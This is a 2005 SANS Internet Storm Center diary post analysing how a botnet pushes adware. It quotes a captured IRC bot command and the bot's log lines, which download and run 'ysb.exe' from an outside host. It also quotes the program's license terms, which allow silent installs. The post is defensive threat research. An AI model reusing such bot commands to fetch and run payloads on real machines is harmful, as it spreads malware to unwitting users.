Threat Level: green Handler on Duty: Tom Webb

SANS ISC: InfoSec Handlers Diary Blog - Botnets and Adwares-Spywares connection InfoSec Handlers Diary Blog


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

Botnets and Adwares-Spywares connection

Published: 2005-11-02
Last Updated: 2005-11-02 12:47:14 UTC
by Pedro Bueno (Version: 1)
0 comment(s)
I am sure you already know about botnets, right? Ok, I am quite sure that you also know that one of the purposes of the botnets, besides all the nice stuff written by our Handler Mike Poor in his diary Big Business surrounding Internet Fraud , is to spread malware, right? Ok (again), today I would like to show you how the botnets are also spreading adware/spyware softwares. As the bot is remotely controlled by the botnet owner, it can do anything...
While investigating a bot today, I found this instruction to the bot:

:MySQL 332 USA|xxxxxxx #c :xdownload32 http://news-affairs.com/ysb.exe c:\ysb.exe 1

This instruction told to my bot to download the ysb.exe 'software' to my computer and open it, as the next messages can show:

#c :[DOWNLOAD]: Downloading URL: http://news-affairs.com/ysb.exe to: c:\ysb.exe.
#c :[DOWNLOAD]: Downloaded 67.3 KB to c:\ysb.exe @ 33.6 KB/sec.
#c :[DOWNLOAD]: Opened: c:\ysb.exe.

As soon as it downloaded it oppened it, this window came up:



This 'software' is recognized by some AV at VirusTotal as a downloader or ISTbar.
Nice points from the License Agreement:

9. OTHER SOFTWARE. You allow that third party software may be installed in the Software and the Integrated Search Technologies shall not be liable to anyone with respect to such third party software.
16. UPDATES. You grant Integrated Search Technologies permission to add/remove features and/or functions to the existing Software and/or Service, or to install new applications or third party software, at any time, in its sole discretion with or without your knowledge and/or interaction. By doing so, you agree to the terms of the new applications. You also grant Integrated Search Technologies permission to make any changes to the Software and/or Service provided at any time.

Ok, ok...old stuff, but always nice to know how these things suddenly appears in your computer...:)
------------------------------------------------------------------
Handler on Duty: Pedro Bueno




Keywords:
0 comment(s)
Diary Archives